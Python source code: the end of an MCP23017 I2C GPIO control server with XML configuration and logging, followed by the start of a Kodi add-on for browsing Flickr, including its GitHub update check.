return_value = 1
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def GetI2CIORegister(self, board_id, reg_nr):
"""
Gets the current value of a pin on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(reg_nr,str)):
reg_nr = int(reg_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (reg_nr < 0) or (reg_nr > 15):
return_value = -1
#aise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = 1
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (reg_nr > 0):
port_id = GPIOB
else:
port_id = GPIOA
# Only start reading if the I2C bus is available
self._log.info(2, "Reading register [0x{:0{}X}], i.e. port [0x{:0{}X}] of board [0x{:0{}X}]".format(reg_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
return_value = 0xff
print("SIMULATION : reading register [0x{:0{}X}] from port [0x{:0{}X}] of board [0x{:0{}X}]".format(return_value, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
return_value = self.i2cbus.read_byte_data(board_id, port_id)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = -1
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = -1
return return_value
def SetI2CPin(self, board_id, pin_nr):
"""
Sets a pin to HIGH on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
#aise Exception("Pin number must be between 0 and 15, but got [", pin_nr, "] for board ", board_id)
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = pin_nr % 8
else:
port_id = GPIOA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to HIGH on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to HIGH on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) | (1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ClearI2CPin(self, board_id, pin_nr):
"""
Sets a pin to LOW on a board
Pin number must be between 0 and 15
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
# Verify if board used already, initialize if not
if self.CheckInitializeBoard(board_id):
return_value = True
# Pin values up to 0x0f go to GPIOA, higher values go to GPIOB
if (pin_nr > 7):
port_id = GPIOB
pin_nr = (pin_nr % 8)
else:
port_id = GPIOA
# Only start writing if the I2C bus is available
self._log.info(2, "Setting pin [0x{:0{}X}] to LOW on port [0x{:0{}X}] for board [0x{:0{}X}]".format(pin_nr, 2, port_id, 2, board_id, 2))
self._i2cMutex.acquire()
try:
if DEMO_MODE_ONLY:
data_byte = (1 << pin_nr)
print("SIMULATION : setting pin [0x{:0{}X}] to LOW on port [0x{:0{}X}] for board [0x{:0{}X}]".format(data_byte, 2, port_id, 2, board_id, 2))
else:
# Read the current state of the IO register, then set ('OR') the one pin
data_byte = self.i2cbus.read_byte_data(board_id, port_id) & ~(1 << pin_nr)
self.i2cbus.write_byte_data(board_id, port_id, data_byte)
except:
# An error happened when accessing the new board, maybe non-existing on the bus
return_value = False
finally:
# Free Mutex to avoid a deadlock situation
self._i2cMutex.release()
else:
return_value = False
return return_value
def ToggleI2CPin(self, board_id, pin_nr, acquire_state = False):
"""
Toggles a bit on the board. If the pin is high, it will be momentarily set to low. If it is low, it will toggle to high.
Pin number must be between 0 and 15.
Per default it is expected that the pin is low in the "off" state and has to be toggled high, e.g. to trigger a momentary
switch. In some cases, the trigger is to the "other" side. acquire_state can be set to first assess the pin and briefly
toggle the pin to the other high/low state.
"""
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Verify if MCP23017 pin number between 0 and 15
if (pin_nr < 0) or (pin_nr > 15):
return_value = False
else:
return_value = True
# Toggling can take a long time, during which the server would not be able to process additional commands.
# To avoid that the server is frozen, toggles are processed in separate threads.
a_thread = Thread(target = self.PinToggler, args = [board_id, pin_nr], daemon = False)
a_thread.start()
return return_value
def WaitForPinToBeReleased(self, board_id, pin_nr, lock_if_free = False):
"""
Toggling can take a long time, during which the server would not be able to process additional commands.
To avoid that the server is frozen, toggles are processed in separate threads. The boards being
processed are maintained in the _toggle_set. As long as a thread has a toggle action going on, no other
actions are allowed on the specific board/pin combination. Therefore, all writes have to wait for the
pin to be freed up again.
"""
# The verification can not last longer than a TOGGLEDELAY. Keep track of the time, and time-out if necessary
checking_time = datetime.now()
keep_checking = True
while keep_checking:
# The _toggle_set is protected with a mutex to avoid that two threads are manipulating at the same
# moment, thus resulting in data errors.
acquired = self._toggle_mutex.acquire(blocking = True, timeout = COMMAND_TIMEOUT)
if acquired:
if (board_id, pin_nr) not in self._toggle_set:
if lock_if_free:
self._toggle_set.add((board_id, pin_nr))
keep_checking = False
self._toggle_mutex.release()
if (datetime.now() - checking_time).total_seconds() > max (COMMAND_TIMEOUT, TOGGLEDELAY):
keep_checking = False
raise "Time-out error trying to acquire pin {} on board {}".format(board_id, pin_nr)
def PinToggler(self, board_id, pin_nr, acquire_state = False):
"""
The PinToggler is a separate process, run in a thread. This allows the main loop to continue processing other read/write requests.
"""
# First make sure to do the bookkeeping.
if self.CheckInitializeBoard(board_id):
Process_Toggle = False
try:
self.WaitForPinToBeReleased(board_id, pin_nr, True)
Process_Toggle = True
except Exception as err:
self._log.error(2, "Unable to toggle pin [0x{:0{}X}] on board [0x{:0{}X}]: Could not get pin free within [{}] seconds. Error Message: {}".format(pin_nr, 2, board_id, 2, COMMAND_TIMEOUT, err))
Process_Toggle = False
if Process_Toggle:
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}]".format(pin_nr, 2, board_id, 2))
# Default is that pin is toggled from low to high briefly.
# If 'acquire_state' is set, the current state is assessed, and switched briefly to the "other" high/low state.
if acquire_state:
current_state = self.GetI2CPin(board_id, pin_nr)
else:
# Default is Low for current state and toggle to high to switch on e.g. a momentary switch.
current_state = 0x0
if current_state == 0x0:
# Current state is low (0x0), and toggling needs to go to high briefly
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}] from LOW to HIGH".format(pin_nr, 2, board_id, 2))
self.SetI2CPin(board_id, pin_nr)
time.sleep(TOGGLEDELAY)
self.ClearI2CPin(board_id, pin_nr)
self._log.info(2, "Toggled pin [0x{:0{}X}] on board [0x{:0{}X}] back from HIGH to LOW".format(pin_nr, 2, board_id, 2))
if current_state == 0x1:
# Current state is high (0x1 or more), and toggling needs to go to low briefly
self._log.info(2, "Toggling pin [0x{:0{}X}] on board [0x{:0{}X}] from HIGH to LOW".format(pin_nr, 2, board_id, 2))
self.ClearI2CPin(board_id, pin_nr)
time.sleep(TOGGLEDELAY)
self.SetI2CPin(board_id, pin_nr)
self._log.info(2, "Toggled pin [0x{:0{}X}] on board [0x{:0{}X}] back from LOW to HIGH".format(pin_nr, 2, board_id, 2))
self._log.info(2, "Releasing (0x{:0{}X}, 0x{:0{}X}) from the Toggle set".format(board_id, 2, pin_nr, 2))
# Make sure to remove the board/pin pair from the _toggle_set at the end, or the pin will be blocked for all other processing
self._toggle_set.remove((board_id, pin_nr))
else:
self._log.error(2, "Toggling pin failed for [0x{:0{}X}] on board [0x{:0{}X}]: could not initialize board.".format(pin_nr, 2, board_id, 2))
def BusIDBlinker(self, board_id = 0x20, num_flashes = 10):
"""
Test routine only, briefly switches pin 15 on the board on and off. It is used to find back a board in the rack.
Please mind that this is a specific routine which expects pin 15 of the MCP23017 to be set as output to an identification LED.
"""
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
for i in range(0, num_flashes):
self.ClearI2CPin(board_id,15)
time.sleep(0.5)
self.SetI2CPin(board_id,15)
time.sleep(0.5)
class xmlParameterHandler():
"""
A class to handle an XML config file that keeps track of boards that were processed.
This XML Parameter Handler is used at boot time, so that the DIR pins of the different boards
are set to their last remembered state. I.e. inputs are set back to inputs and outputs are
re-configured as outputs after the cold boot.
During the processing, the XML file is constantly updated when the DIR (input vs. output) of
a pin changes.
"""
def __init__(self, the_log, xml_file_name = ''):
# Copy logfile to local
self._log = the_log
# Only read config file if a name was provided
if (CONFIGURATION_FILE == '') and (xml_file_name == ''):
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
self._use_config_file = False
else:
self._use_config_file = True
from os.path import expanduser
# Set location of file, go default if no file given
if xml_file_name == "":
self._filename = "{}/{}".format(expanduser("~"), CONFIGURATION_FILE)
else:
self._filename = xml_file_name
# Create initial empty datastring
self.read_parameter_file()
@property
def get_all_boards(self):
return self._confdata[0]
def get_board_dir(self, board_id, port_id):
"""
Get the Direction value of a specific board
"""
return_value = "0xff"
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
if(isinstance(port_id, int)):
port_id = '0x{:0{}X}'.format(port_id,2)
have_found_lev1 = False
for child in self._confdata[0]:
have_found_lev2 = False
if child.attrib["name"] == board_id:
have_found_lev1 = True
for subchild in child:
if subchild.attrib["name"] == port_id:
return_value = subchild.text
have_found_lev2 = True
if (not(have_found_lev2)) or (len(child) != 2):
self._confdata[0].remove(child)
have_found_lev1 = False
if not(have_found_lev1):
self.CreateNewKey(board_id)
return return_value
def set_board_dir(self, board_id, port_id, newvalue):
"""
Set the Direction value for a specific board
"""
return_value = True
if self._use_config_file:
# if byte or integer given, update to hex byte
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
if(isinstance(port_id, int)):
port_id = '0x{:0{}X}'.format(port_id,2)
if(isinstance(newvalue, int)):
newvalue = '0x{:0{}X}'.format(newvalue,2)
# Verify if value already exists (and create key if not in the file yet)
comparevalue = self.get_board_dir(board_id, port_id)
# update board and port pair, and write back to paramete file
if comparevalue != newvalue:
for child in self._confdata[0]:
if child.attrib["name"] == board_id:
for subchild in child:
if subchild.attrib["name"] == port_id:
subchild.text = newvalue
return_value = self.write_parameter_file()
return return_value
def set_board_pin(self, board_id, pin_nr):
"""
Set the pin value of the Direction register for a specific board
"""
return_value = True
if self._use_config_file:
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
currentvalue = self.get_board_dir(board_id, port_id)
if(isinstance(currentvalue,str)):
currentvalue = int(currentvalue, 16)
newvalue = currentvalue | (1 << pin_nr)
return_value = self.set_board_dir(board_id, port_id, newvalue)
return True
def clear_board_pin(self, board_id, pin_nr):
"""
Clear the pin value of the Direction register for a specific board
"""
return_value = True
if self._use_config_file:
# Verify in inputs are given as hex. Convert to int if so
if(isinstance(board_id,str)):
board_id = int(board_id, 16)
if(isinstance(pin_nr,str)):
pin_nr = int(pin_nr, 16)
# Pin values up to 0x0f go to IODIRA, higher values go to IODIRB
if (pin_nr > 7):
port_id = IODIRB
pin_nr = pin_nr % 8
else:
port_id = IODIRA
currentvalue = self.get_board_dir(board_id, port_id)
if(isinstance(currentvalue,str)):
currentvalue = int(currentvalue, 16)
newvalue = currentvalue & ~(1 << pin_nr)
return_value = self.set_board_dir(board_id, port_id, newvalue)
return return_value
def DeleteKey(self, board_id):
"""
Clear the Key in the XML file for a board that is apparently no longer used.
"""
return_value = True
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
have_found = False
for child in self._confdata[0]:
if child.attrib["name"] == board_id:
have_found = True
self._confdata[0].remove(child)
if have_found:
return_value = self.write_parameter_file()
return return_value
def CreateNewKey(self, board_id):
"""
Create a new Key in the XML file and set the initial values to OUTPUT (Oxff).
"""
return_value = True
if self._use_config_file:
if(isinstance(board_id, int)):
board_id = '0x{:0{}X}'.format(board_id,2)
# make sure you are not creating a key that already exists
self.DeleteKey(board_id)
attrib = {'name': board_id}
element = self._confdata[0].makeelement('board', attrib)
self._confdata[0].append(element)
index = len(self._confdata[0]) - 1
attrib = {'name': '0x{:0{}X}'.format(IODIRA,2)}
element = self._confdata[0][index].makeelement('port', attrib)
element.text = ALLOUTPUTS
self._confdata[0][index].append(element)
attrib = {'name': '0x{:0{}X}'.format(IODIRB,2)}
element = self._confdata[0][index].makeelement('port', attrib)
element.text = ALLOUTPUTS
self._confdata[0][index].append(element)
return_value = self.write_parameter_file()
return return_value
def read_parameter_file(self):
"""
Read the XML parameter file from the current home directory. Create an empty new one if nothing exists.
"""
return_value = True
if self._use_config_file:
if os.path.exists(self._filename):
self._log.info(2, "Reading Config XML file")
try:
# Read file, this will fail if the file does not exist (yet)
ConfTree = ET.parse(self._filename)
self._confdata = ConfTree.getroot()
except:
self._log.info(2, "Reading Config file FAILED. Creating a new one. ")
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
return_value = self.write_parameter_file()
else:
self._confdata = ET.fromstring(b'<DATA>\n <i2cboards>\n </i2cboards>\n</DATA>')
return_value = self.write_parameter_file()
return return_value
def write_parameter_file(self):
"""
Write the XML parameter file from the current home directory. Just try ...
"""
return_value = True
if self._use_config_file:
self._log.info(2, "Writing Config file. ")
try:
self.xml_pretty_print(self._confdata[0])
outString = ET.tostring(self._confdata)
outFile = open(self._filename,"w")
outFile.write(outString.decode('ascii'))
outFile.close()
return_value = True
except Exception as err:
return_value = False
# Disable further write attempts if the file cannot be written.
self._use_config_file = False
if LOG_LEVEL > 0:
print("Could not write parameter file [{}]. Error: {}".format(self._filename, err))
self._log.info("Could not write parameter file [{}]. Error: {}".format(self._filename, err))
return return_value
def xml_pretty_print(self, element, level=0):
"""
Format the XML data as properly indented items for better reading.
"""
# Inspired by https://norwied.wordpress.com/2013/08/27/307/
# Kudos go to Norbert and Chris G. Sellers
padding = ' '
indent = "\n{}".format(padding * level)
if len(element):
if not element.text or not element.text.strip():
element.text = "{} ".format(indent)
if not element.tail or not element.tail.strip():
element.tail = indent
for elem in element:
self.xml_pretty_print(elem, level+1)
if not element.tail or not element.tail.strip():
element.tail = indent
else:
if level and (not element.tail or not element.tail.strip()):
element.tail = indent
class LogThis():
"""
A class for keeping track of the logging.
In case that logging is requested, errors are tracked in the log file if the level is > 0. At high verbosity (level >= 3),
all actions are logged for debugging purposes.
"""
def __init__(self):
# Set Logging details
if LOG_LEVEL > 0:
self._log_enabled = True
try:
from os.path import expanduser
# Set location of file, go default if no file given
self._filename = "{}/{}".format(expanduser("~"), LOG_FILE)
self.log_formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
self.my_handler = RotatingFileHandler(self._filename, mode='a', maxBytes=10*1024*1024, backupCount=2, encoding=None, delay=0)
self.my_handler.setFormatter(self.log_formatter)
self.my_handler.setLevel(logging.INFO)
self.app_log = logging.getLogger('root')
self.app_log.setLevel(logging.INFO)
self.app_log.addHandler(self.my_handler)
except Exception as err:
self._log_enabled = False
if LOG_LEVEL > 0:
print("Error while creating log file: {}. ".format(str(err)))
else:
self._log_enabled = False
def info(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.info(info_text)
def debug(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.debug(info_text)
def error(self, info_level, info_text):
if self._log_enabled:
if (LOG_LEVEL > 1) or (info_level == LOG_LEVEL):
self.app_log.error(info_text)
def InitBusAtBoot(the_log, xmldata, i2chandler):
"""
If the program starts first time, pull the remembered boards from the XML config file. Set the proper input/output pin states to the last ones remembered.
"""
# Read the configured boards from the config file
the_log.info(2, "Reading board information from XML parameter file.")
boarddata = xmldata.get_all_boards
# Process boards one by one
for board in boarddata:
# Get the board ID (hex board number)
board_id = board.attrib["name"]
# Process both ports in the MCP23017 board (if configured both)
for port in board:
# Get Port A or B ID
port_id = port.attrib["name"]
# print error message to the systemctl log file
if LOG_LEVEL == 2:
print("Port [{}] of board [{}] should be set to [{}]".format(port_id, board_id, port.text))
the_log.info(2, "Port [{}] of board [{}] should be set to [{}]".format(port_id, board_id, port.text))
# Write the I/O state to the port
if not(i2chandler.WriteI2CDir(board_id, port_id, port.text)):
if LOG_LEVEL == 2:
print("That didn't work for board [{}]".format(board_id))
the_log.info(2, "That didn't work for board [{}]".format(board_id))
# If that didn't work, the board may have been removed before booting. Remove it from the config file.
xmldata.DeleteKey(board_id)
def main():
"""
Main program function.
"""
# Start a logger and provide info
my_log = LogThis()
my_log.info(1, "mcp23017server starting, running version [{}].".format(VERSION))
# Parameter file for board input/output configurations
my_log.info(2, "Creating XML Parameter Handler")
xmldata = xmlParameterHandler(my_log)
# Separate I2C handler, including a Mutex to make sure other clients are not messing with the I2C bus
my_log.info(2, "Creating I2C Communication Handler")
i2chandler = i2cCommunication(my_log)
# Initialize the I2C bus at first run (manual run), or at boot time (if set up as a service).
my_log.info(2, "Initializing I2C devices")
InitBusAtBoot(my_log, xmldata, i2chandler)
# Set up a new broker - this is the main part of the software.
my_log.info(2, "Creating a Message Broker")
mybroker = mcp23017broker(my_log, i2chandler, xmldata)
# Process commands forever
while True:
mybroker.service_commands()
my_log.error(1, "FATAL EXIT WITH ERROR [{}]".format(my_error_state))
# Do a controlled exist with fail code. Trigger the OS to restart the service if configured.
sys.exit(1)
if __name__ == "__main__":
"""
Entry point when program is called from the command line.
"""
main()
|
flickrexplorer.py
|
# -*- coding: utf-8 -*-
# Python3-Kompatibilität:
from __future__ import absolute_import # sucht erst top-level statt im akt. Verz.
from __future__ import division # // -> int, / -> float
from __future__ import print_function # PYTHON2-Statement -> Funktion
from kodi_six import xbmc, xbmcaddon, xbmcplugin, xbmcgui, xbmcvfs
# o. Auswirkung auf die unicode-Strings in PYTHON3:
from kodi_six.utils import py2_encode, py2_decode
import os, sys
PYTHON2 = sys.version_info.major == 2
PYTHON3 = sys.version_info.major == 3
if PYTHON2:
from urllib import quote, unquote, quote_plus, unquote_plus, urlencode, urlretrieve
from urllib2 import Request, urlopen, URLError
from urlparse import urljoin, urlparse, urlunparse, urlsplit, parse_qs
elif PYTHON3:
from urllib.parse import quote, unquote, quote_plus, unquote_plus, urlencode, urljoin, urlparse, urlunparse, urlsplit, parse_qs
from urllib.request import Request, urlopen, urlretrieve
from urllib.error import URLError
try: # https://github.com/xbmc/xbmc/pull/18345 (Matrix 19.0-alpha 2)
xbmc.translatePath = xbmcvfs.translatePath
except:
pass
# Python
import ssl # HTTPS-Handshake
from io import BytesIO # Python2+3 -> get_page (compressed Content), Ersatz für StringIO
import gzip, zipfile
from threading import Thread # thread_getpic
import shutil # thread_getpic
import json # json -> Textstrings
import re # u.a. Reguläre Ausdrücke
import math # für math.ceil (aufrunden)
import resources.lib.updater as updater
# Addonmodule + Funktionsziele (util_imports.py)
import resources.lib.util_flickr as util
PLog=util.PLog; check_DataStores=util.check_DataStores; make_newDataDir=util. make_newDataDir;
Dict=util.Dict; name=util.name; ClearUp=util.ClearUp;
UtfToStr=util.UtfToStr; addDir=util.addDir; R=util.R; RLoad=util.RLoad; RSave=util.RSave;
repl_json_chars=util.repl_json_chars; mystrip=util.mystrip; DirectoryNavigator=util.DirectoryNavigator;
stringextract=util.stringextract; blockextract=util.blockextract;
cleanhtml=util.cleanhtml; decode_url=util.decode_url; unescape=util.unescape;
transl_json=util.transl_json; repl_json_chars=util.repl_json_chars; seconds_translate=util.seconds_translate;
get_keyboard_input=util.get_keyboard_input; L=util.L; RequestUrl=util.RequestUrl; PlayVideo=util.PlayVideo;
make_filenames=util.make_filenames; CheckStorage=util.CheckStorage; MyDialog=util.MyDialog;
del_slides=util.del_slides;
# +++++ FlickrExplorer - Addon Kodi-Version, migriert von der Plexmediaserver-Version +++++
VERSION = '0.7.4'
VDATE = '26.09.2021'
#
#
#
# (c) 2019 by Roland Scholz, rols1@gmx.de
#
# Licensed under MIT License (MIT)
# (previously licensed under GPL 3.0)
# A copy of the License you find here:
# https://github.com/rols1/Kodi-Addon-FlickrExplorer/blob/master/LICENSE.md
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# Flickr: https://www.flickr.com/
# Wikipedia: https://de.wikipedia.org/wiki/Flickr
FANART = 'art-flickr.png' # Hintergrund
ICON_FLICKR = 'icon-flickr.png'
ICON_SEARCH = 'icon-search.png'
ICON_FOLDER = 'Dir-folder.png'
ICON_OK = "icon-ok.png"
ICON_WARNING = "icon-warning.png"
ICON_NEXT = "icon-next.png"
ICON_CANCEL = "icon-error.png"
ICON_MEHR = "icon-mehr.png"
ICON_MEHR_1 = "icon-mehr_1.png"
ICON_MEHR_10 = "icon-mehr_10.png"
ICON_MEHR_100 = "icon-mehr_100.png"
ICON_MEHR_500 = "icon-mehr_500.png"
ICON_WENIGER_1 = "icon-weniger_1.png"
ICON_WENIGER_10 = "icon-weniger_10.png"
ICON_WENIGER_100 = "icon-weniger_100.png"
ICON_WENIGER_500 = "icon-weniger_500.png"
ICON_WORK = "icon-work.png"
ICON_GALLERY = "icon-gallery.png"
ICON_MAIN_UPDATER = 'plugin-update.png'
ICON_UPDATER_NEW = 'plugin-update-new.png'
ICON_INFO = "icon-info.png"
NAME = 'FlickrExplorer'
BASE = "https://www.flickr.com"
GALLERY_PATH = "https://www.flickr.com/photos/flickr/galleries/"
PHOTO_PATH = "https://www.flickr.com/photos/"
REPO_NAME = 'Kodi-Addon-FlickrExplorer'
GITHUB_REPOSITORY = 'rols1/' + REPO_NAME
REPO_URL = 'https://github.com/{0}/releases/latest'.format(GITHUB_REPOSITORY)
PLog('Addon: lade Code')
PluginAbsPath = os.path.dirname(os.path.abspath(__file__)) # abs. Pfad für Dateioperationen
RESOURCES_PATH = os.path.join("%s", 'resources') % PluginAbsPath
ADDON_ID = 'plugin.image.flickrexplorer'
SETTINGS = xbmcaddon.Addon(id=ADDON_ID)
ADDON_NAME = SETTINGS.getAddonInfo('name')
SETTINGS_LOC = SETTINGS.getAddonInfo('profile')
ADDON_PATH = SETTINGS.getAddonInfo('path')
ADDON_VERSION = SETTINGS.getAddonInfo('version')
PLUGIN_URL = sys.argv[0]
HANDLE = int(sys.argv[1])
PLog("ICON: " + R(ICON_FLICKR))
TEMP_ADDON = xbmc.translatePath("special://temp")
USERDATA = xbmc.translatePath("special://userdata")
ADDON_DATA = os.path.join("%s", "%s", "%s") % (USERDATA, "addon_data", ADDON_ID)
PLog("ADDON_DATA: " + ADDON_DATA)
DICTSTORE = os.path.join("%s/Dict") % ADDON_DATA
SLIDESTORE = os.path.join("%s/slides") % ADDON_DATA
PLog(DICTSTORE);
check = check_DataStores() # Check /Initialisierung / Migration
PLog('check: ' + str(check))
try: # 28.11.2019 exceptions.IOError möglich, Bsp. iOS ARM (Thumb) 32-bit
from platform import system, architecture, machine, release, version # Debug
OS_SYSTEM = system()
OS_ARCH_BIT = architecture()[0]
OS_ARCH_LINK = architecture()[1]
OS_MACHINE = machine()
OS_RELEASE = release()
OS_VERSION = version()
OS_DETECT = OS_SYSTEM + '-' + OS_ARCH_BIT + '-' + OS_ARCH_LINK
OS_DETECT += ' | host: [%s][%s][%s]' %(OS_MACHINE, OS_RELEASE, OS_VERSION)
except:
OS_DETECT =''
KODI_VERSION = xbmc.getInfoLabel('System.BuildVersion')
PLog('Addon: ClearUp')
ARDStartCacheTime = 300 # 5 Min.
# Dict: Simpler Ersatz für Dict-Modul aus Plex-Framework
days = SETTINGS.getSetting('DICT_store_days')
if days == 'delete': # slides-Ordner löschen
del_slides(SLIDESTORE)
SETTINGS.setSetting('DICT_store_days','100')
xbmc.sleep(100)
days = 100
else:
days = int(days)
Dict('ClearUp', days) # Dict bereinigen
####################################################################################################
# Auswahl Sprachdatei / Browser-locale-setting
# Locale-Probleme unter Plex s. Plex-Version
# hier Ersatz der Plex-Funktion Locale.LocalString durch einfachen Textvergleich -
# s. util.L
# Kodi aktualisiert nicht autom., daher Aktualsierung jeweils in home.
def ValidatePrefs():
PLog('ValidatePrefs:')
try:
lang = SETTINGS.getSetting('language').split('/') # Format Bsp.: "English/en/en_GB"
loc = str(lang[1]) # en
if len(lang) >= 2:
loc_browser = str(lang[2]) # en_GB
else:
loc_browser = loc # Kennungen identisch
except Exception as exception:
PLog(repr(exception))
loc = 'en' # Fallback (Problem Setting)
loc_browser = 'en-US'
loc_file = os.path.join("%s", "%s", "%s") % (RESOURCES_PATH, "Strings", '%s.json' % loc)
PLog(loc_file)
if os.path.exists(loc_file) == False: # Fallback Sprachdatei: englisch
loc_file = os.path.join("%s", "%s", "%s") % (RESOURCES_PATH, "Strings", 'en.json')
Dict('store', 'loc', loc)
Dict('store', 'loc_file', loc_file)
Dict('store', 'loc_browser', loc_browser)
PLog('loc: %s' % loc)
PLog('loc_file: %s' % loc_file)
PLog('loc_browser: %s' % loc_browser)
####################################################################################################
def Main():
PLog('Main:');
PLog('Addon-Version: ' + VERSION); PLog('Addon-Datum: ' + VDATE)
PLog(OS_DETECT)
PLog('Addon-Python-Version: %s' % sys.version)
PLog('Kodi-Version: %s' % KODI_VERSION)
PLog(PluginAbsPath)
ValidatePrefs()
li = xbmcgui.ListItem()
title=L('Suche') + ': ' + L('im oeffentlichen Inhalt')
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="Search", fanart=R(ICON_SEARCH), thumb=R(ICON_SEARCH),
fparams=fparams, summary=L('Suchbegriff im Suchfeld eingeben und Return druecken'))
if SETTINGS.getSetting('username'): # Menü MyFlickr für angemeldete User
summ = 'User: ' + SETTINGS.getSetting('username')
fparams="&fparams={}"
addDir(li=li, label='MyFlickr', action="dirList", dirID="MyMenu", fanart=R('icon-my.png'), thumb=R('icon-my.png'),
fparams=fparams, summary=summ)
title=L('Photostream')
summ = L('Fotos') + ' ' + L('im oeffentlichen Inhalt')
fparams="&fparams={'query': 'None', 'user_id': 'None'}"
addDir(li=li, label=title, action="dirList", dirID="Search_Work", fanart=R('icon-stream.png'), thumb=R('icon-stream.png'),
fparams=fparams, summary=summ)
title = L('Web Galleries')
fparams="&fparams={'pagenr': '1'}"
addDir(li=li, label=title, action="dirList", dirID="WebGalleries", fanart=R(ICON_GALLERY), thumb=R(ICON_GALLERY),
fparams=fparams)
title = L('Flickr Nutzer')
summ = L("Suche Nutzer und ihre Inhalte") + ': ' + str(SETTINGS.getSetting('FlickrPeople'))
fparams="&fparams={}"
addDir(li=li, label=title, action="dirList", dirID="FlickrPeople", fanart=R('icon-user.png'), thumb=R('icon-user.png'),
fparams=fparams, summary=summ)
# Updater-Modul einbinden:
repo_url = 'https://github.com/{0}/releases/'.format(GITHUB_REPOSITORY)
call_update = False
if SETTINGS.getSetting('pref_info_update') == 'true': # Updatehinweis beim Start des Addons
ret = updater.update_available(VERSION)
if ret[0] == False:
msg1 = L("Github ist nicht errreichbar")
msg2 = 'update_available: False'
PLog("%s | %s" % (msg1, msg2))
MyDialog(msg1, msg2, '')
else:
int_lv = ret[0] # Version Github
int_lc = ret[1] # Version aktuell
latest_version = ret[2] # Version Github, Format 1.4.1
if int_lv > int_lc: # Update-Button "installieren" zeigen
call_update = True
title = 'neues Update vorhanden - jetzt installieren'
summary = 'Addon aktuell: ' + VERSION + ', neu auf Github: ' + latest_version
# Bsp.: https://github.com/rols1/Kodi-Addon-ARDundZDF/releases/download/0.5.4/Kodi-Addon-ARDundZDF.zip
url = 'https://github.com/{0}/releases/download/{1}/{2}.zip'.format(GITHUB_REPOSITORY, latest_version, REPO_NAME)
url=py2_encode(url);
fparams="&fparams={'url': '%s', 'ver': '%s'}" % (quote_plus(url), latest_version)
addDir(li=li, label=title, action="dirList", dirID="resources.lib.updater.update", fanart=R(FANART),
